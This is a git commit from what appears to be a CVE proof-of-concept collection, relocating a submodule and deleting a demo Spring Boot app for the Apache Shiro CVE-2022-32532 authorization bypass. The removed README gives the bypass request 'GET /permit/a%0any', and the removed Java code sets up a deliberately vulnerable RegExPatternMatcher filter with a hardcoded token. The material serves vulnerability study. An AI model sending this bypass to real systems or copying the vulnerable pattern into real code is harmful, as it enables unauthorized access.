添加CVE-2022-32532

2023-04-13 11:53:55 +08:00 · 2023-04-13 11:53:55 +08:00 · b895418fa3
parent 4833f1f578
commit b895418fa3
11 changed files with 2 additions and 239 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -5,6 +5,6 @@
 [submodule "cve/django/2022/CVE-2022-28346/POC_env"]
 	path = cve/django/2022/CVE-2022-28346/POC_env
 	url = https://github.com/DeEpinGh0st/CVE-2022-28346
-[submodule "CVE-2022-32532"]
+[submodule "cve/apache-Shiro/2022/CVE-2022-32532"]
-	path = CVE-2022-32532
+	path = cve/apache-Shiro/2022/CVE-2022-32532
 	url = https://github.com/Lay0us1/CVE-2022-32532
--- a/cve/apache-Shiro/2022/CVE-2022-32532
+++ b/cve/apache-Shiro/2022/CVE-2022-32532
--- a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@ -1,33 +0,0 @@
 HELP.md
 target/
 !.mvn/wrapper/maven-wrapper.jar
 !**/src/main/**/target/
 !**/src/test/**/target/
 ### STS ###
 .apt_generated
 .classpath
 .factorypath
 .project
 .settings
 .springBeans
 .sts4-cache
 ### IntelliJ IDEA ###
 .idea
 *.iws
 *.iml
 *.ipr
 ### NetBeans ###
 /nbproject/private/
 /nbbuild/
 /dist/
 /nbdist/
 /.nb-gradle/
 build/
 !**/src/main/**/build/
 !**/src/test/**/build/
 ### VS Code ###
 .vscode/
--- a/cve/apache-Shiro/2022/CVE-2022-32532/README.md
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@ -1,35 +0,0 @@
 # CVE-2022-32532
 ## about
 This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532). 
 In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
 ## introduce
 Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
 This request can succeed
 ```http request
 GET /permit/any HTTP/1.1
 Token: 4ra1n
 ```
 Access is not allowed when there is no token request header
 ```http request
 GET /permit/any HTTP/1.1
 ```
 It can be bypassed in a simple way in special but common configurations
 ```http request
 GET /permit/a%0any HTTP/1.1
 ```
 ## reference
 https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
 This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
 Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
--- a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@ -1,38 +0,0 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.0</version>
        <relativePath/>
    </parent>
    <groupId>com.example</groupId>
    <artifactId>shiro-demo</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>shiro-demo</name>
    <description>CVE-2022-32532</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-spring</artifactId>
            <version>1.9.0</version>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
 </project>
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@ -1,21 +0,0 @@
 package com.example.shirodemo;
 import org.springframework.web.bind.annotation.PathVariable;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
@RestController
 public class DemoController {
    @RequestMapping(path = "/permit/{value}")
    public String permit(@PathVariable String value) {
        System.out.println("success!");
        return "success";
    }
    // Another Bypass
    // @RequestMapping(path = "/permit/*")
    public String permit() {
        System.out.println("success!");
        return "success";
    }
 }
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@ -1,35 +0,0 @@
 package com.example.shirodemo;
 import org.apache.shiro.util.RegExPatternMatcher;
 import org.apache.shiro.web.filter.AccessControlFilter;
 import javax.servlet.ServletRequest;
 import javax.servlet.ServletResponse;
 import javax.servlet.http.HttpServletRequest;
 import java.io.IOException;
 public class MyFilter extends AccessControlFilter {
    public MyFilter(){
        super();
        this.pathMatcher = new RegExPatternMatcher();
    }
    @Override
    protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
        String token = ((HttpServletRequest)request).getHeader("Token");
        // todo: check permission ...
        return token != null && token.equals("4ra1n");
    }
    @Override
    protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
        System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
        try {
            response.getWriter().println("access denied");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return false;
    }
 }
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@ -1,40 +0,0 @@
 package com.example.shirodemo;
 import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
 import org.apache.shiro.mgt.SecurityManager;
 import org.apache.shiro.util.RegExPatternMatcher;
 import org.apache.shiro.web.filter.mgt.*;
 import org.apache.shiro.web.mgt.WebSecurityManager;
 import org.apache.shiro.web.servlet.AbstractShiroFilter;
 public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
    public MyShiroFilterFactoryBean() {
        super();
    }
    @Override
    protected AbstractShiroFilter createInstance() {
        SecurityManager securityManager = this.getSecurityManager();
        FilterChainManager manager = new DefaultFilterChainManager();
        manager.addFilter("myFilter",new MyFilter());
        // my filter
        manager.addToChain("/permit/.*", "myFilter");
        // todo: add other filters
        PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
        chainResolver.setFilterChainManager(manager);
        // set RegExPatternMatcher
        chainResolver.setPathMatcher(new RegExPatternMatcher());
        return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
    }
    static class SpringShiroFilter extends AbstractShiroFilter {
        protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
            this.setSecurityManager(webSecurityManager);
            this.setFilterChainResolver(resolver);
        }
    }
 }
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@ -1,22 +0,0 @@
 package com.example.shirodemo;
 import org.apache.shiro.mgt.SecurityManager;
 import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
@Configuration
 public class ShiroConfig {
    @Bean
    public SecurityManager securityManager() {
        return new DefaultWebSecurityManager();
    }
    @Bean
    public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
        MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
        shiroFilterFactoryBean.setSecurityManager(securityManager);
        return shiroFilterFactoryBean;
    }
 }
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@ -1,13 +0,0 @@
 package com.example.shirodemo;
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
 public class ShiroDemoApplication {
    public static void main(String[] args) {
        SpringApplication.run(ShiroDemoApplication.class, args);
    }
 }
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties